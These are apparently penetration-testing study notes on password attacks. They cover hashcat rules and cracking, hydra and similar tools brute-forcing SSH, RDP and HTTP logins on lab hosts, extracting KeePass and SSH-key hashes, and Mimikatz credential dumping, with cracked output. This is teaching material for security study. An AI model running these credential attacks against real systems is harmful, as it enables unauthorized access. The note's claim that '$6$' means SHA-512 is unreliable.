# Brute Force Attacks

## Tools

### Hashcat

Hashcat Rules:

* $ : append a character
* ^ : prepend a character
* c : capitalize the first letter

Apply rules to a wordlist:

```bash
hashcat -r demo.rule --stdout demo.txt
```
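As an added illustration of how the rule functions above combine (example code written for these notes, not hashcat's own code), this Python script interprets a small rule file the way `--stdout` would print the candidates; the `demo.rule` and `demo.txt` contents are constructed.

```python
# Added example (not hashcat's code): a tiny interpreter for the rule
# functions above ($X append, ^X prepend, c capitalize) plus ':' (no-op),
# imitating `hashcat -r demo.rule --stdout demo.txt`.
from typing import Iterable, List

def parse_rule(line: str) -> List[str]:
    # Functions on a line are whitespace-separated and applied left to right.
    # Simplification: lines starting with '#' are skipped, and a function whose
    # argument is itself a space (e.g. '$ ') is not handled.
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    return line.split()

def apply_function(func: str, word: str) -> str:
    op, arg = func[0], func[1:]
    if op == ":":   # no-op: emit the word unchanged
        return word
    if op == "$":   # $X: append character X
        return word + arg
    if op == "^":   # ^X: prepend character X
        return arg + word
    if op == "c":   # c: upper-case first letter, lower-case the rest (hashcat semantics)
        return word[:1].upper() + word[1:].lower()
    raise ValueError(f"unsupported rule function: {func!r}")

def apply_rule(functions: List[str], word: str) -> str:
    # A rule line is a sequence of functions applied to one candidate.
    for func in functions:
        word = apply_function(func, word)
    return word

def mangle(words: Iterable[str], rules_text: str) -> List[str]:
    # Every rule line is applied to every word, as --stdout would emit them.
    rules = [r for r in (parse_rule(l) for l in rules_text.splitlines()) if r]
    return [apply_rule(rule, word) for word in words for rule in rules]

# Constructed demo.rule / demo.txt contents (not from any real wordlist).
DEMO_RULE = """\
# constructed demo.rule
:
c
c $1 $2 $3
c ^! $!
"""
DEMO_WORDS = ["password", "summer"]

def demo() -> List[str]:
    # Candidates derived from two base words: a "capital plus digits or a
    # symbol" complexity policy is covered by this four-line rule file.
    return mangle(DEMO_WORDS, DEMO_RULE)
```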

Lookup a hash type code:

```bash
hashcat --help | grep -i "KeePass"
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)         | Password Manager
```

### Hash-Identifier

```bash
hash-identifier
> <HASH>
```

## Online Services

### SSH

```bash
hydra -l username -P /path/to/password/wordlist.txt -s [port] ssh://192.168.x.x
```

### RDP

Brute forcing RDP may lock out accounts if the security policy is configured to lock an account after too many failed logon attempts.

```bash
hydra -l username -P /path/to/password/wordlist.txt -s [port] rdp://192.168.x.x
```

Hydra's RDP module is not reliably accurate:

```bash
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
```

Impacket has a much more accurate logon check:

```bash
impacket-rdp_check <domain>/<name>:<password>@<IP>
```

Create a script that checks usernames and passwords given a specific domain and IP.

### HTTP

HTTP POST form:

{% code overflow="wrap" %}

```bash
hydra -l user -P /path/to/password/wordlist.txt 192.168.x.x http-post-form "/index.php:fm_usr=^USER^&fm_pwd=^PASS^:Login failes. Invalid"
```

{% endcode %}

HTTP basic authentication:

{% code overflow="wrap" %}

```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
```

{% endcode %}

## Local Services

### KeePass

Transfer the .kdbx database file to your local machine and extract the hash:

```bash
keepass2john Database.kdbx > keepass.hash
```

Remove the file name (everything up to and including the first colon) from the resulting hash:

{% code overflow="wrap" %}

```bash
Database:$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1

^ remove name

$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1
```

{% endcode %}

The hashcat mode for KeePass is 13400:

{% code overflow="wrap" %}

```bash
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
```

{% endcode %}

### SSH Private Key

A user's private key can be found at `/home/user/.ssh/id_rsa`.

To use a private key, it needs the following permissions applied:

```bash
chmod 600 id_rsa
```

Connect over SSH using a private key:

```bash
ssh -i id_rsa dave@192.168.50.21
```

Retrieve the hash from `id_rsa`:

```bash
ssh2john id_rsa > ssh.hash
```

(Don't forget to remove the file name from the resulting hash.)

{% code overflow="wrap" %}

```bash
kali@kali:~/passwordattacks$ cat ssh.hash
$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e7373682d6b65792d7631000000000a6165733235362d6374720000000662637279707400000018000000107059e78a8d3764ea1e883fcdf592feb7000000100000000100000197000000077373682...
```

{% endcode %}

In this example, the **$6$** signifies SHA-512.

```bash
john --wordlist=ssh.passwords ssh.hash
```

### NTLM Cracking

We cannot simply copy, rename, or move the SAM database from **C:\Windows\system32\config\sam**, so we need to use the *Mimikatz* tool to bypass this restriction.

Mimikatz also includes the *sekurlsa* module, which extracts password hashes from the Local Security Authority Subsystem Service (LSASS) process memory. LSASS is the Windows process that handles user authentication, password changes, and access token creation.

```bash
kali@kali:~/passwordattacks$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
hashcat (v6.2.5) starting
...
3ae8e5f0ffabb3a627672e1600f1ba10:nicole1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 3ae8e5f0ffabb3a627672e1600f1ba10
Time.Started.....: Thu Jun  2 04:11:28 2022, (0 secs)
Time.Estimated...: Thu Jun  2 04:11:28 2022, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 17926.2 kH/s (2.27ms) @ Accel:256 Loops:77 Thr:1 Vec:8
...
```
